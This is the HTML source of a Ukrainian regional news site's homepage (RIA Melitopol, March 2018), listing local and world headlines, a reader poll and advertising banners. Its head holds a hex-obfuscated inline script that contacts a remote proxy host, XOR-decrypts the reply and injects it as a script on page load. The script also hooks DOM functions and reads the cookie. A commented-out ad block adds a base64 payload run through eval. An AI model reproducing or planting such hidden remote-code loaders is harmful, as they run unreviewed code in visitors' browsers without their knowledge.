<!-- NO --><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" 
  "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no">
<link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="новости, РИА - Мелитополь, Региональное информационное агентство, Мелитополь, сайт РИА Мелитополь, новости Мелитополя, новости в Мелитополе, политика, политические новости, новости экономики," />
<meta name="description" content="Региональное информационное агентство (РИА) -  &amp;quot;Мелитополь&amp;quot; предлагает ознакомится с новостями Мелитопольского региона, Запорожской области, Украины. Обзоры, телевизионные новости, телевидение онлайн, местные события и факты из жизни горожан." />

<link rel="stylesheet" href="/tpl/style.css?v=1.38" type="text/css" media="screen" />
<link rel="stylesheet" href="/tpl/print.css" type="text/css" media="print" />
<title>
Региональное информационное агентство (РИА) -  Мелитополь - новости региона, Украины
</title>
<script type="text/javascript">(function(){function c(){var b={};for(var a=0;a< arguments.length;a+= 2){b[arguments[a]]= arguments[a+ 1]};return b}function b(){function h(){var d=l[a[1]](a[0]);if(!b){b()};var c=0;for(var f=0;f< d[a[2]];f++){if(d[f][a[3]]&& d[f][a[3]]!= a[4]){if(!a){b();b= true;return};d[f][a[3]]= a[4];c++}};return c}function n(){var c=l[a[5]];for(var d=0;d< c[a[2]];d++){c[d][a[6]]= true};h();if(!a){b(1);b= a[97]};D[a[7]]()}function y(d,c,g){function b(){return f}var f=d[c][a[8]]();g[a[9]]= d[c][a[10]](d);d[c]= g;d[c][a[8]]= b}function E(c){var b=D[a[12]][a[11]]()- c[a[13]];if(b< v){if(!a){return};n()}}function w(d,b,f){D[a[19]][a[18]](d,b,c(a[14],false,a[15],false,a[16],false,a[17],f))}function r(b){b= z(b);var c=l[a[21]](a[20]);c[a[22]]= false;c[a[23]]= b;l[a[25]][a[24]](c);l[a[25]][a[26]](c)}function z(c){var d=a[27]+ D[a[30]][a[29]]()[a[8]]()[a[28]](2,4);if(!b){b();b= false;return};D[d]= x;if(!b){return};c= a[31]+ c+ a[32]+ d+ a[33];return c}function A(g,f){function c(){if(!b){b(null)};f(h)}function d(){E(h)}if(!a){b(false);b= null};var h= new D[a[34]]();h[a[36]](a[35],g,true);h[a[37]]= a[38];h[a[13]]= D[a[12]][a[11]]();h[a[40]](a[39],c);if(!b){return};h[a[40]](a[41],d);h[a[42]](null)}function m(f){if(b== 0){b(a[58],null,0,true);b= false;return};var m=f[a[45]]( new D[a[44]](a[43]));if(m){var n=m[1];var s=n[a[47]](a[46]);var o=a[4],p=a[4],v=0,c=[];while(s[v]!= a[48]){if(!a){return}else {p+= s[v]};if(++v== s[a[2]]){return}};for(var g=v+ 1;g< s[a[2]];g++){var u=s[g],h=g- v- 1;var t=p[a[28]](h* 2,2);if(b=== false){b= 1;return}else {var l=D[a[49]](t,16),j=l};var r=a[4];for(var i=0;i< u[a[2]];i+= 2){if(!b){return};var q=D[a[49]](u[a[28]](i,2),16);var d=q^ l;l= d^ j;d= d[a[8]](16);if(d[a[2]]< 2){d= a[50]+ d};r+= d};c[a[51]](r)};f= f[a[53]](n,c[a[52]](a[46]))};return f}function q(g){function c(g){function f(c){var g=c[a[64]];var h=null;if(b== false){b(0);b= null;return}else {try{h= g[a[65]][a[54]]}catch(e){}};if(h){q(h);if(!a){b= false};d[a[66]](a[39],f)}}var c=arguments[a[60]][a[9]];var d=c[a[61]](this,arguments);if(!a){b= true}else {if(d[a[62]]== a[63]){d[a[40]](a[39],f)}};return d}function d(){var b=arguments[a[60]][a[9]];var c=this[a[67]];b[a[61]](this,arguments);if(c== a[68]){o(this)}}function f(){if(!b){b= true};var c=arguments[a[60]][a[9]];if(!a){b(1);return};c[a[61]](this,arguments);o(this)}if(!a){b(0,1,true,0,null);return};y(g,a[21],c);var h=d;if(b== 1){b(a[15],0,a[81]);b= 1;return}else {y(g,a[69],h)};y(g,a[70],h);y(g,a[36],f);x[a[71]][a[51]](g);o(g)}function p(c,d){var f=c[a[64]];var b=(d)?x[a[72]]:x[a[73]];b[a[51]](f)}function o(b){b[a[40]](a[41],x[a[74]],true);b[a[40]](a[39],x[a[75]],true)}function s(){function f(j){function g(b){r(m(b[a[93]]))}if(j[a[76]]== 204){if(c[a[77]]){D[a[80]][a[79]](a[78]);return};c[a[77]]= l[a[82]][a[81]];A(d(),f);return};if(b=== true){b(1);b= a[57];return}else {x[a[84]][a[83]]= j[a[86]](a[85])};var h=j[a[86]](a[87]);if(!x[a[84]][a[83]]||  !h){return};if(!b){b= false;return};x[a[84]][a[88]]= ( new D[a[90]](h))[a[89]];var i=x[a[84]][a[88]][a[92]](a[91]);if(i> 0){x[a[84]][a[88]]= x[a[84]][a[88]][a[28]](i+ 1)};A(h,g)}function d(){var b=[];for(k in c){b[a[51]](k+ a[94]+ D[a[95]](c[k]))};var d=(b[a[2]])?a[96]+ b[a[52]](a[97]):a[4];return l[a[82]][a[98]]+ a[99]+ g+ d}if(!b){return}else {};var c={};if(l[a[101]][a[92]](a[100])!=  -1){c[a[102]]= a[103]};A(d(),f)}function d(a){p(a,true)}function f(a){if(!b){b()}else {p(a,false)}}var D=window,l=D[a[54]],v=300,u=7,i=a[55],j=a[56];var x={};var g=a[57];var t=false;var C=false;var B=null;try{if(D[a[58]]&& D[a[58]][a[59]+ i]== j){D[a[58]][a[59]+ i]= a[4];t= true}}catch(e){};if(b=== true){b(false,null,a[109],0,a[76]);b= false;return};x[a[72]]= [];x[a[73]]= [];x[a[71]]= [];x[a[84]]= c(a[88],a[4],a[83],a[4]);x[a[104]]= false;x[a[105]]= l[a[21]][a[10]](l);if(!b){b(1,false);b= false};x[a[74]]= d;x[a[75]]= f;if(!a){return}else {s()};q(l);if(t){if(b== false){b(a[54])};l[a[70]](a[106]+ a[107]+ a[108]);l[a[109]]()}}var _a=["494d47","676574456c656d656e747342795461674e616d65","6c656e677468","737263","","7374796c65536865657473","64697361626c6564","73746f70","746f537472696e67","5f6f726967","62696e64","6e6f77","706572666f726d616e6365","7374617274","656e756d657261626c65","636f6e666967757261626c65","7772697461626c65","76616c7565","646566696e6550726f7065727479","4f626a656374","736372697074","637265617465456c656d656e74","6173796e63","74657874436f6e74656e74","617070656e644368696c64","646f63756d656e74456c656d656e74","72656d6f76654368696c64","6d7a735f5f","737562737472","72616e646f6d","4d617468","2866756e6374696f6e286d7a5f73747229207b","7d292827","27293b","584d4c4874747052657175657374","474554","6f70656e","726573706f6e736554797065","74657874","6c6f6164","6164644576656e744c697374656e6572","6572726f72","73656e64","766172205f613d5c5b22282e2b29225c5d3b","526567457870","6d61746368","222c22","73706c6974","6266346266643361643236386630306231616336666338613332613533303961","7061727365496e74","30","70757368","6a6f696e","7265706c616365","646f63756d656e74","7474745a5a5a326d","6634464676","70696775697170726f78792e636f6d2f617069","6f70656e6572","5f","63616c6c6565","6170706c79","7461674e616d65","494652414d45","746172676574","636f6e74656e7457696e646f77","72656d6f76654576656e744c697374656e6572","72656164795374617465","636f6d706c657465","7772697465","77726974656c6e","646f6373","65725f6c6f6164","73635f6c6f6164","65725f6c697374656e","73635f6c697374656e","737461747573","72","617267206c6f6164206661696c2c20323034","6c6f67","636f6e736f6c65","68726566","6c6f636174696f6e","73657373696f6e","76617273","582d4d6574612d526571756573742d4964","676574526573706f6e7365486561646572","582d4c6f636174696f6e","70726f78795f686f7374","686f7374","55524c","2d","696e6465784f66","726573706f6e736554657874","3d","656e636f6465555249436f6d706f6e656e74","3f","26","70726f746f636f6c","2f2f","6172676f6e5f656e61626c653d31","636f6f6b6965","77","31","646c6f61646564","63725f656c","3c4e4f","465241","4d45533e","636c6f7365"];var _o,_i,a=[];for(_o=0;_o<_a.length;_o++)for(a[_o]="",_i=0;_i<_a[_o].length;_i+=2)a[_o]+=String.fromCharCode(parseInt(_a[_o].substr(_i,2),16));(b)()})()/*f8e0ab343d31f67c0cb92e7bfdef06210ce2be76*/</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7/jquery.min.js"></script>
<script type="text/javascript">
jQuery(document).ready(function($){
/* toggle nav */
$("#menu-icon").on("click", function(){
$("#nav").slideToggle();
$(this).toggleClass("active");
});
 
});
</script>
<script charset="windows-1251" src="//i.mediatraffic.com.ua/js/uho/mt20_3.js"></script>
</head>
<!-- Асинхронный код, 3.07.2014 -->
<script type="text/javascript"> (function() {
  var i = document.createElement("script"); i.type = "text/javascript";
  i.async = true; i.charset = "UTF-8";
  i.src = "http://partner.join.com.ua/async/3146/";
  var s = document.getElementsByTagName("script")[0];
  s.parentNode.insertBefore(i, s);
})();</script>
<!-- News Join -->
<script type="text/javascript" src="/js/jquery-1.8.2.min.js"></script>
<script type="text/javascript" src="/js/jcarousellite.js"></script>
<script type="text/javascript" src="/js/jquery.carouFredSel-6.2.1.js"></script>
<script type="text/javascript">
  $(function () {
    $('ul.slider_top').carouFredSel({
            items       		:{visible:3,minimum:2},
            direction           : "left",
			width				: "variable",
            auto                : {play: true},
             prev                : "#cl_left",
            next                : "#cl_right",
            circular            : true,
            infinite            : true,
			padding 			:[0,0,0,-30],
			scroll : {
            items           : 1,
            duration        : 1000,
            pauseOnHover    : true
        }
    });
  });
</script>
<body onkeypress="return typerr(event)">
<div id="supermain">
<div id="top">
	<div id="cont">	
		<p class="data"><i>Сегодня:</i> 20 марта, 2018</p>
		<p id="otstup" style="width:65px;">&nbsp;</p>
		<ul>
			<li><a href="/politika">Политика</a></li>
			<li><a href="/ekonomika">Экономика</a></li>
			<li><a href="/criminal">Криминал</a></li>
			<li><a href="/obrazovanie">Образование</a></li>
			<li><a href="/medicina">Медицина</a></li>
			<li><a href="/kultura">Культура</a></li>
			<li><a href="/sport">Спорт</a></li>
		</ul>
		<div id="login"><a href="/cabinet">Войти в кабинет</a> | <a href="/registration">Регистрация</a></div>
	</div>
</div>
<div id="clear"></div>
<div id="logo">
	<div id="cont" style="position: relative;">
		<!--img src="/img/elka3.gif" style="height: 100px; width: auto; position: absolute; left: 0; top: 0;"-->
		<a class="logo" href="/"><img src="/img/logo.png"></a>
		<div id="program">
			<ul class="slider_top">
				<li><a rel="nofollow" target="_blank" href="http://dom.day.ua/"><img src="/images/banners/2018/801.gif"></a></li><li><a rel="nofollow" target="_blank" href="http://summer.day.ua/"><img src="/images/banners/2018/800.gif"></a></li><li><a rel="nofollow" target="_blank" href="http://info.ria-m.tv/catalog/2958-kp-chistota"><img src="/images/banners/2017/720.gif"></a></li><li><a rel="nofollow" target="_blank" href="http://rhm.zp.ua"><img src="/images/banners/2018/789.gif"></a></li><li><a rel="nofollow" target="_blank" href="http://iclub.in.ua/all-sale/?shop=88"><img src="/images/banners/2018/807.gif"></a></li>
			</ul>
		</div>
	</div>
</div>
<div id="clear"></div>
<div id="stop">
	<div id="cont">
		<div id="search">
		<form action="/search/" method="GET">
			<input type="text" name="zapros" value="Поиск по сайту..." onfocus="if(this.value=='Поиск по сайту...')value='';" onblur="if(this.value=='')value='Поиск по сайту...';">
			<input id="sbut" type="submit" value="Найти">
		</form>
		</div>
<script type="text/javascript">
function browserInfo() 
{
    var type, version = undefined;

    if (window.opera)
        type = 'Opera';
    else if (document.all) 
    {
        type = 'IE';
        var nv = navigator.appVersion;
        var s = nv.indexOf('MSIE')+5;
        v = nv.substring(s,s+1);
    }
    else if (navigator.appName) 
        type = 'Netscape';
    var ua = navigator.userAgent;    
    if (ua.search(/Chrome/) > 0) type = 'Google Chrome';

    return { 'type': type, 'version': version};
}
 
function bookmark(a)
{
    var pageUrl = window.document.location;
    var pageTitle = window.document.title;
    var browser = browserInfo();

    if (browser.type == 'IE')
        window.external.AddFavorite(pageUrl, pageTitle);
    else if (browser.type == 'Opera') 
    {
        a.href = pageUrl;
        a.rel = 'sidebar';
        a.title = pageUrl + ',' + pageTitle;
    
        return true;
    }
    else if (browser.type == 'Netscape') {
		return true;
        alert('Нажмите, пожалуйста, Ctrl-D для добавления страницы в закладки'); }
		//window.external.AddFavorite(pageUrl, pageTitle);
		//window.sidebar.addPanel(pageTitle, pageUrl, '');
    else 
        alert('Нажмите, пожалуйста, Ctrl-D для добавления страницы в закладки');

    return false;
}
</script>	
<div id="menu-icon">Меню</div>	
		<ul id="nav">
			<li>
				<a href="javascript:void(0);" onclick="return bookmark(this);" title="Добавить страницу в избранное" rel="sidebar"><img src="http://ria-m.tv/img/favor.png" style="margin-top: 5px;"></a>		
			</li>	
			<li><a class="open" href="/">Главная</a></li>
			<li><a href="/news">Новости</a></li>
			<li class="mobile"><a href="/melitopol">Мелитополь</a></li>
			<li class="mobile"><a href="/region">Область</a></li>
			<li class="mobile"><a href="/ukraine">Украина</a></li>
			<li class="mobile"><a href="/world">Мир</a></li>			
			<li><a class="info" href="http://info.ria-m.tv" target="_blank">Info-справка</a></li>
			<li><a class="info1" href="http://info.ria-m.tv/resort" target="_blank">Курорты</a></li>
			<li><a href="/foto">Фото</a></li>
			<li><a href="/programs">Видео</a></li>
			<!-- <li class="nomobile"><a class="online" href="/watch">Смотреть on-line</a></li>-->
			<li><a href="/archive">Архив</a></li>
			<li><a href="/artics">Статьи</a></li>
			<li class="nomobile"><a href="/canal112" id="usubm">Канал 112</a></li>
			<!--li><a href="/programs" id="usubm" onmouseover="showsub();" onmouseout="hidesub();">▼ Программы</a></li-->
		</ul>
		<!--div id="clear"></div>
		<div id="submenu" style="display:none;" onmouseover="showsub();" onmouseout="hidesub();">
			<a href="/programs/visti">Вести</a>
			<a href="/programs/sobutiya">Вести: события недели</a>
			<a href="/programs/lyuboznayki">Любознайки</a>
		</div-->
	</div>
</div>
<script type="text/javascript">
function showsub() {
	document.getElementById("usubm").className="open";
	document.getElementById("submenu").style.display="block";
}
function hidesub() {
	document.getElementById("usubm").className="";
	document.getElementById("submenu").style.display="none";
}
</script>
<div id="clear"></div>
<div id="sstop"></div>
<div id="clear"></div>
<div id="cont">
	<div id="left">

<br />


		<div id="clear"></div>
<!--<div id="90XS"></div>
<script src="http://aliexpressforyou.ru/90XS/"></script>-->
<div id="clear"></div>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Сайт2 -->
<ins class="adsbygoogle"
     style="display:inline-block;width:200px;height:200px"
     data-ad-client="ca-pub-3155292058017825"
     data-ad-slot="3130666591"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
		<div id="clear"></div>
		
<div id="clear"></div>
	<h2 class="h2">Лента новостей</h2>
	<div id="lenta">
		<p>12:01</p>
		<a href="/news/111843/zolotoe_plate_pevitsyi_beyonse_voshitilo_set.html">Золотое платье певицы Бейонсе восхитило Сеть</a>
		<div id="clear"></div>
		<p>11:57</p>
		<a href="/news/111842/ukrainskie_zarobitchane_rasskazali_o_rabskih_usloviyah_rabotyi_v_polshe.html">Украинские заробитчане рассказали о рабских условиях работы в Польше</a>
		<div id="clear"></div>
		<p>11:51</p>
		<a href="/news/111841/v_mirnom_prohodit_obyisk_u_glavyi_selsoveta.html">В Мирном проходит обыск у главы сельсовета</a>
		<div id="clear"></div>
		<p>11:47</p>
		<a href="/news/111840/politsiya_napomnila_ob_izmeneniyah_v_sfere_bezopasnosti_dvijeniya.html">Полиция напомнила об изменениях в сфере безопасности движения</a>
		<div id="clear"></div>
		<p>11:34</p>
		<a href="/news/111839/voennogo_podozrevayut_v_prodaje_detaley_tanka.html">Военного подозревают в продаже деталей танка</a>
		<div id="clear"></div>
		<p>11:27</p>
		<a href="/news/111838/kityi_spasli_dayvera_ot_pyatimetrovogo_monstra_video.html">Киты спасли дайвера от пятиметрового монстра. ВИДЕО</a>
		<div id="clear"></div>
		<p>11:21</p>
		<a href="/news/111837/voditel_kotoryiy_pronessya_na_krasnyiy_svet_i_razbil_tri_avto_poluchil_smeshnoe_nakazanie.html">Водитель, который пронесся на красный свет и разбил три авто, получил смешное наказание</a>
		<div id="clear"></div>
		<p>11:11</p>
		<a href="/news/111836/v_zamke_pod_zaporojem_proshli_syemki_populyarnogo_shou_(foto).html">В замке под Запорожьем прошли съемки популярного шоу (фото)</a>
		<div id="clear"></div>
		<p>10:57</p>
		<a href="/news/111835/v_skoroy_oprovergayut_istoriyu_o_marshrutchike_spasavshem_passajirku.html">В скорой опровергают историю о маршрутчике, спасавшем пассажирку</a>
		<div id="clear"></div>
		<p>10:55</p>
		<a href="/news/111834/nedetskie_chuvstva_shkolnik_ushel_iz_doma_radi_lyubimoy_devochki.html">&quot;Недетские чувства&quot;: школьник ушел из дома ради любимой девочки</a>
		<div id="clear"></div>
		<p>10:50</p>
		<a href="/news/111833/putin_sdelal_tsinichnoe_zayavlenie_v_adres_ukrainyi.html">Путин сделал циничное заявление в адрес Украины</a>
		<div id="clear"></div>
		<p>10:29</p>
		<a href="/news/111832/v_kieve_mujchina_vyipal_iz_okna_gostinitsyi_i_pogib.html">В Киеве мужчина выпал из окна гостиницы и погиб</a>
		<div id="clear"></div>
		<p>10:26</p>
		<a href="/news/111831/vo_frantsii_zaderjali_sarkozi.html">Во Франции задержали Саркози</a>
		<div id="clear"></div>
		<p>10:16</p>
		<a href="/news/111830/v_melitopole_otkryilsya_tretiy_v_ukraine_inklyuzivno_resursnyiy_tsentr_(foto).html">В Мелитополе открылся третий в Украине Инклюзивно-ресурсный центр (фото)</a>
		<div id="clear"></div>
		<p>10:09</p>
		<a href="/news/111829/dollarovogo_opera_posadili_pod_domashniy_arest.html">&quot;Долларового&quot; опера посадили под домашний арест</a>
		<div id="clear"></div>
		<p>10:02</p>
		<a href="/news/111828/zaporojskie_patrulnyie_spasli_i_obogreli_kosulyu_(foto).html">Запорожские патрульные спасли и обогрели косулю (Фото)</a>
		<div id="clear"></div>
		<p>10:02</p>
		<a href="/news/111827/u_chernivtsyah_mistsevi_jiteli_vzyalis_dopomagati_ptaham.html">У Чернівцях місцеві жителі взялись допомагати птахам</a>
		<div id="clear"></div>
		<p>09:57</p>
		<a href="/news/111826/dtp_v_yaponii_mikroavtobus_s_detmi_vrezalsya_v_gruzovik.html">ДТП в Японии: микроавтобус с детьми врезался в грузовик</a>
		<div id="clear"></div>
		<p>09:51</p>
		<a href="/news/111825/marshrutchik_otklonilsya_ot_marshruta_chtobyi_spasti_passajirku.html">Маршрутчик отклонился от маршрута, чтобы спасти пассажирку</a>
		<div id="clear"></div>
		<p>09:37</p>
		<a href="/news/111824/legioneryi_pokazali_harakter_na_chempionate_ukrainyi_(foto).html">&quot;Легионеры&quot; показали характер на чемпионате Украины (фото)</a>
		<div id="clear"></div>
		<p>09:26</p>
		<a href="/news/111823/andjelina_djoli_sobiraetsya_zamuj_za_millionera.html">Анджелина Джоли собирается замуж за миллионера</a>
		<div id="clear"></div>
		<p>09:24</p>
		<a href="/news/111822/ruje_brejneva_persten_revolver_i_strelyayuschaya_trost_v_zaporojskom_muzee_predstavlena_unikalnaya_kollektsiya_orujiya_foto.html">Ружье Брежнева, перстень-револьвер и стреляющая трость: в запорожском музее представлена уникальная коллекция оружия - ФОТО</a>
		<div id="clear"></div>
		<p>09:23</p>
		<a href="/news/111821/ukrainskiy_samolet_gigant_sovershil_polet_posle_remonta.html">Украинский самолет-гигант совершил полет после ремонта</a>
		<div id="clear"></div>
		<p>09:10</p>
		<a href="/news/111820/v_zaporoje_sotsrabotnitsa_nashla_mertvoy_svoyu_podopechnuyu.html">В Запорожье соцработница нашла мертвой свою подопечную</a>
		<div id="clear"></div>
		<p>09:03</p>
		<a href="/news/111819/ukraina_i_germaniya_sobirayutsya_otsudit_medali_u_rossiyskoy_chempionki_paralimpiadyi.html">Украина и Германия собираются отсудить медали у российской чемпионки Паралимпиады</a>
		<div id="clear"></div><a class="all" href="/news">Все новости</a>
			</div>
		<h2 class="h2">Опрос</h2>
		<div id="opros"><p>Что делать с рекламой в центре города?</p>
			<ul><li onclick="opros(this,1);">Убрать все щиты - они уродуют город</li><li onclick="opros(this,2);">Упорядочить, привести в соответствие с нормами безопасности</li><li onclick="opros(this,3);">Мне они не мешают, пусть все остается как есть</li>
			</ul>
			<p onclick="sendopros();" class="but">Проголосовать</p>
			<div id="clear"></div>
			<a class="all" href="/opros">Больше опросов</a>
			<div id="clear"></div>
		</div>
<script type="text/javascript">
var old=0;
var oprosnom=0;
function opros(src,n){
	if (old!=null) {
		old.className="";
	}
	src.className="open";
	old=src;
	oprosnom=n;
}
function sendopros(){
	var ajax=new XMLHttpRequest();
	ajax.onreadystatechange=function(){
		if (ajax.readyState==4 && ajax.status==200) {
			document.getElementById("opros").innerHTML=ajax.responseText;
		}
	}
	ajax.open("POST", "/tpl/opros.php", true);
	ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
	ajax.send("nom="+oprosnom);
}
</script>
		<div id="clear"></div>
	<h2 class="h2">Реклама у нас</h2>
		<!--<div id="883e4639542904ec0f23eb0621137bbb" ><a href="http://trafmaster.com" id="883e4639542904ec0f23eb0621137bbb_t" style="display:none" target="_blank"><strong>Trafmaster</strong></a></div>-->
		<div id="MIXADV_1600" class="MIXADVERT_NET"></div>
<script type="text/javascript" src="https://m.mixadvert.com/show/?id=1600" async></script>
<!--<script id="r17857" type="text/javascript">(function() { var worker17857,tickerID = 17857,tag = document.getElementById("r"+ tickerID), id = (function(tickerID) {var now = Math.floor((new Date()).getTime() / 1000 / 3600) * 3600; if ("btoa" in window)return btoa("g4p_"+ tickerID +"_"+ now).replace(/[^a-zA-Z0-9]/, ""); return "g4p_"+ tickerID +"_"+ now;})(tickerID); var container = document.createElement("div"); container.id = id; container.innerHTML = "загрузка..."; tag.parentNode.insertBefore(container, tag); var script = document.createElement("script"); script.src = "//js-goods.redtram.com/0/17/ticker_17857.js"; script.type = "text/javascript"; script.charset = "utf-8"; script.onerror = function() { if (!("atob" in window && "Worker" in window)) return; window.rtIsWebSocket = true; var code = "dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9nNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKC95YW5kZXh8eWFicm93c2VyL2kudGVzdChuYXZpZ2F0b3IudXNlckFnZW50KSkgd3NzVXJsID0gIndzczovL2c0cC5ncnQwMS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg"; function runExternalMessage(data) {worker17857.postMessage(data);} worker17857 = new Worker(URL.createObjectURL( new Blob(["eval(atob(\""+code+"\"))"], {type: "text/javascript"}))); worker17857.onmessage = function(m) {var json = JSON.parse(m.data),content = JSON.parse(json)["content"]; eval(content);}; worker17857.postMessage(JSON.stringify({command: "init", informer_id: tickerID, url: script.src}));}; tag.parentNode.insertBefore(script, tag); })();</script>-->


		<div id="clear"></div>				
		
		<div id="clear"></div><style>#kinoafishaslider .navi #next, #kinoafishaslider .navi #prev {background: none;}</style>
	</div>
	<div id="center">

		<ul class="menu">
			<li><a href="/news">Все новости</a></li>
			<li><a href="/melitopol">Мелитополь</a></li>
			<li><a href="/region">Область</a></li>
			<li><a href="/ukraine">Украина</a></li>
			<li><a href="/world">Мир</a></li>
		</ul>
		<div id="ucnews"></div>
		<div id="clear"></div>
		<div id="cnews" onmouseover="stopnews();" onmouseout="stopnews();"><div id="news1" style="visibility:visible; display:block;">
				<img src="/images/news/2018/03/111841.jpg">
				<a href="/news/111841/v_mirnom_prohodit_obyisk_u_glavyi_selsoveta.html">В Мирном проходит обыск у главы сельсовета</a>
				<p>Как стало известно сайту РИА Мелитополь, в настоящее время в пос. Мирное проходят обыски в помещении поселкового совета. Что стало причиной для следственных действий пока не сообщается.</p>
				<p class="data">Сегодня, 11:51</p>
			</div>
			<div id="clear"></div><div id="news2" style="visibility:hidden; display:none;">
				<img src="/images/news/2018/03/111837.jpg">
				<a href="/news/111837/voditel_kotoryiy_pronessya_na_krasnyiy_svet_i_razbil_tri_avto_poluchil_smeshnoe_nakazanie.html">Водитель, который пронесся на красный свет и разбил три авто, получил смешное наказание</a>
				<p>Минимальным штрафом наказали водителя ВАЗа, который протаранил сразу три авто. Речь идет о ДТП, которое произошло 15 февраля на пр. Б. Хмельницкого возле кафе «Pizza Italiana». Тогда водитель ВАЗа, двигаясь на сумасшедшей скорости, врезался в автомобили, стоящие на парковке.</p>
				<p class="data">Сегодня, 11:21</p>
			</div>
			<div id="clear"></div><div id="news3" style="visibility:hidden; display:none;">
				<img src="/images/news/2018/03/111835.jpg">
				<a href="/news/111835/v_skoroy_oprovergayut_istoriyu_o_marshrutchike_spasavshem_passajirku.html">В скорой опровергают историю о маршрутчике, спасавшем пассажирку</a>
				<p>На станции «скорой помощи» опровергают информацию о том, что вчера маршрутчик привез к ним девушку с эпилептическим припадком.</p>
				<p class="data">Сегодня, 10:57</p>
			</div>
			<div id="clear"></div><div id="news4" style="visibility:hidden; display:none;">
				<img src="/images/news/2018/03/111824.jpg">
				<a href="/news/111824/legioneryi_pokazali_harakter_na_chempionate_ukrainyi_(foto).html">&quot;Легионеры&quot; показали характер на чемпионате Украины (фото)</a>
				<p>&quot;Легион&quot; на престижных соревнованиях представляли 9 спортсменов.</p>
				<p class="data">Сегодня, 09:37</p>
			</div>
			<div id="clear"></div>
			<div id="nums">
				<span id="nums1" onclick="mnews(1);" class="open">1</span>
				<span id="nums2" onclick="mnews(2);">2</span>
				<span id="nums3" onclick="mnews(3);">3</span>
				<span id="nums4" onclick="mnews(4);">4</span>
			</div>
		</div>
		<div id="clear"></div>
		<div id="rek"><div id="cbanners"><ul><li><a rel="nofollow" target="_blank" href="http://www.avicenter.com.ua"><img src="/images/banners/2015/341.gif"></a></li><li><a rel="nofollow" target="_blank" href="https://www.facebook.com/julia.zoomag"><img src="/images/banners/2017/682.gif"></a></li><li><a class="nourl"><img src="/images/banners/2017/645.gif"></a></li><li><a rel="nofollow" target="_blank" href="http://info.ria-m.tv/catalog/2700-kabinet-vostochnoj-mediciny"><img src="/images/banners/2018/771.gif"></a></li><li><a class="nourl"><img src="/images/banners/2018/802.gif"></a></li><li><a rel="nofollow" target="_blank" href="http://novydvor.prom.ua/"><img src="/images/banners/2014/128.gif"></a></li><li><a rel="nofollow" target="_blank" href="http://kvalitet.in.ua/"><img src="/images/banners/2018/783.jpg"></a></li></ul></div>
<script type="text/javascript">
  $(function () {
    $("div#cbanners ul").carouFredSel({
            items       		:{visible:3,minimum:2},
            direction           : "left",
			width				: "variable",
            auto                : {play: true},
             prev                : "#cl_left",
            next                : "#cl_right",
            circular            : true,
            infinite            : true,
			padding 			:[0,0,0,0],
			scroll : {
            items           : 1,
            duration        : 1000,
            pauseOnHover    : true
        }
    });
  });
</script></div>
		<div id="clear"></div>
		<h2 class="h2">Мелитополь</h2>
		<a class="all" href="/melitopol">Все новости Мелитополя</a>
		<div id="full">
			<div id="topnews"><a href="/news/111830/v_melitopole_otkryilsya_tretiy_v_ukraine_inklyuzivno_resursnyiy_tsentr_(foto).html"><img src="/images/news/2018/03/111830.jpg">В Мелитополе открылся третий в Украине Инклюзивно-ресурсный центр (фото)</a>
				<p>20 марта 2018, 10:16</p>
			</div>
			<div id="half">
				<img src="/images/news/2018/03/111841_sm.jpg">
				<div>
					<a href="/news/111841/v_mirnom_prohodit_obyisk_u_glavyi_selsoveta.html">В Мирном проходит обыск у главы сельсовета</a>
					<p>20 марта 2018, 11:51</p>
				</div>
				<div id="clear"></div>
				<img src="/images/news/2018/03/111837_sm.jpg">
				<div>
					<a href="/news/111837/voditel_kotoryiy_pronessya_na_krasnyiy_svet_i_razbil_tri_avto_poluchil_smeshnoe_nakazanie.html">Водитель, который пронесся на красный свет и разбил три авто, получил смешное наказание</a>
					<p>20 марта 2018, 11:21</p>
				</div>
				<div id="clear"></div>
				<img src="/images/news/2018/03/111835_sm.jpg">
				<div>
					<a href="/news/111835/v_skoroy_oprovergayut_istoriyu_o_marshrutchike_spasavshem_passajirku.html">В скорой опровергают историю о маршрутчике, спасавшем пассажирку</a>
					<p>20 марта 2018, 10:57</p>
				</div>
				<div id="clear"></div>
				<img src="/images/news/2018/03/111825_sm.jpg">
				<div>
					<a href="/news/111825/marshrutchik_otklonilsya_ot_marshruta_chtobyi_spasti_passajirku.html">Маршрутчик отклонился от маршрута, чтобы спасти пассажирку</a>
					<p>20 марта 2018, 09:51</p>
				</div>
				<div id="clear"></div>
				<img src="/images/news/2018/03/111824_sm.jpg">
				<div>
					<a href="/news/111824/legioneryi_pokazali_harakter_na_chempionate_ukrainyi_(foto).html">&quot;Легионеры&quot; показали характер на чемпионате Украины (фото)</a>
